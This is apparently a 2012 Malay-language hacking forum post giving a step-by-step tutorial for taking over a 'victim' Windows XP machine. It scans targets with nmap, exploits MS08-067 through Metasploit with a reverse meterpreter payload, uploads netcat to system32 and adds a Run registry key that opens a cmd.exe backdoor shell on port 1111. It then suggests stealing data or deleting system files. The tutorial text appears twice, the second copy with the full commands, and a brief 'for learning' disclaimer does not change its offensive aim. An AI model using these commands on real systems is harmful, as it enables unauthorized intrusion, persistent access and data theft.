03-09-2012, 06:30 AM
Penerangan:-
Tutorial kali ini adalah proses dimana kita dapat mengawal komputer mangsa hanya dengan menggunakan Backdoor yang telah kita masukkan ke dalam komputer mangsa. Komputer mangsa mestilah menggunakan Windows XP. JOM!!
Perkakasan Yang Diperlukan:-
1. Backtrack
2. Metasploit
3. NMap
4. NetCat
Langkah-Langkah:-
1. Buka terminal di Backtrack dan taip
Secara automaticnya di Desktop Backtrack anda akan muncul satu fail nc.exe
2. Kemudian buka terminal baru (New Tab), taipkan kata arahan NMap IP Address mangsa untuk melihat OS yang digunakan
kata arahan diatas digunakan jika anda mempunyai IP Address Mangsa anda
kata arahan diatas digunakan jika anda ingin mencari mangsa secara rawak
3. Setelah anda mempunyai mangsa, buka metasploit di terminal baru anda
4. Kemudian taipkan kata arahan dibawah
5. Biarkan ianya running sehinggalah anda berjaya mendapatkan SESSION mangsa. Anda berjaya mendapatkan SESSION mangsa apabila satu kata arahan keluar iaitu
6. Setelah itu, taipkan kata arahan dibawah untuk memasukkan Backdoor nc.exe tadi ke dalam komputer mangsa
7. Setelah proses muat naik selesai, sekarang ada proses untuk menyemak registry komputer mangsa
8. Sekarang adalah proses untuk mendaftar backdoor nc.exe tadi ke registry komputer mangsa
9. Sekarang pula adalah proses untuk menyemak backdoor yang telah dimasukkan ke registry mangsa
10. Reboot komputer mangsa
11. Setelah komputer mangsa direboot, kini masanya untuk membuat penyambungan ke komputer mangsa dengan hanya menggunakan Backdoor kita tadi. Buka terminal anda dan taipkan kata arahan dibawah
12. DONE! kini anda telah berada di System komputer mangsa.
13. Dengan backdoor, anda boleh buat apa sahaja termasuklah mencuri data, format, delete system32, masukkan virus dan sebagainya.
PERHATIAN: Ini adalah proses pembelajaran. Gunakanlah ia dijalan yang betol. Jadilah penggodam yang berguna dan bukannya perosak
Maaf. Bahasa yang digunakan adalah Bahasa Malaysia, sekadar berkongsi dengan 2 buah negara yang saya sayang. Maaf juga kalau ada salah
-=Reserved for screen shot=-
Tutorial kali ini adalah proses dimana kita dapat mengawal komputer mangsa hanya dengan menggunakan Backdoor yang telah kita masukkan ke dalam komputer mangsa. Komputer mangsa mestilah menggunakan Windows XP. JOM!!
Perkakasan Yang Diperlukan:-
1. Backtrack
2. Metasploit
3. NMap
4. NetCat
Langkah-Langkah:-
1. Buka terminal di Backtrack dan taip
Code:
# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
2. Kemudian buka terminal baru (New Tab), taipkan kata arahan NMap IP Address mangsa untuk melihat OS yang digunakan
Code:
# nmap -sS -O [IP_MANGSA]
Code:
# nmap -sS -O 192.168.1.1-255
Quote:Untuk tutorial ini, anda memerlukan mangsa yang menggunakan OS Microsoft Windows XP sahaja!
3. Setelah anda mempunyai mangsa, buka metasploit di terminal baru anda
Code:
# msfconsole
4. Kemudian taipkan kata arahan dibawah
Code:
> use exploit/windows/smb/ms08_067_netapi
Code:
> set payload windows/meterpreter/reverse_tcp
Code:
> set LHOST [IP_anda]
Code:
> set RHOST [IP_mangsa]
Code:
> exploit
5. Biarkan ianya running sehinggalah anda berjaya mendapatkan SESSION mangsa. Anda berjaya mendapatkan SESSION mangsa apabila satu kata arahan keluar iaitu
Code:
meterpreter >
6. Setelah itu, taipkan kata arahan dibawah untuk memasukkan Backdoor nc.exe tadi ke dalam komputer mangsa
Code:
> upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\
7. Setelah proses muat naik selesai, sekarang ada proses untuk menyemak registry komputer mangsa
Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN
Quote:Proses ini juga untuk menjalankan Backdoor tadi setiap kali mangsa membuka komputer
8. Sekarang adalah proses untuk mendaftar backdoor nc.exe tadi ke registry komputer mangsa
Code:
> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe"
9. Sekarang pula adalah proses untuk menyemak backdoor yang telah dimasukkan ke registry mangsa
Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Quote:Anda akan mendapati Backdoor anda telah pon berada pada registry komputer mangsa
10. Reboot komputer mangsa
Code:
> reboot
11. Setelah komputer mangsa direboot, kini masanya untuk membuat penyambungan ke komputer mangsa dengan hanya menggunakan Backdoor kita tadi. Buka terminal anda dan taipkan kata arahan dibawah
Code:
# nc [IP_MANGSA] 1111
12. DONE! kini anda telah berada di System komputer mangsa.
13. Dengan backdoor, anda boleh buat apa sahaja termasuklah mencuri data, format, delete system32, masukkan virus dan sebagainya.
PERHATIAN: Ini adalah proses pembelajaran. Gunakanlah ia dijalan yang betol. Jadilah penggodam yang berguna dan bukannya perosak
Maaf. Bahasa yang digunakan adalah Bahasa Malaysia, sekadar berkongsi dengan 2 buah negara yang saya sayang. Maaf juga kalau ada salah
-=Reserved for screen shot=-
-= You will NEVER learn a new things IF you NEVER make a mistake =-
My Twitter: @c0d3br34k
IRC Server: irc.anonops.pro (c0d3br34k)
My Twitter: @c0d3br34k
IRC Server: irc.anonops.pro (c0d3br34k)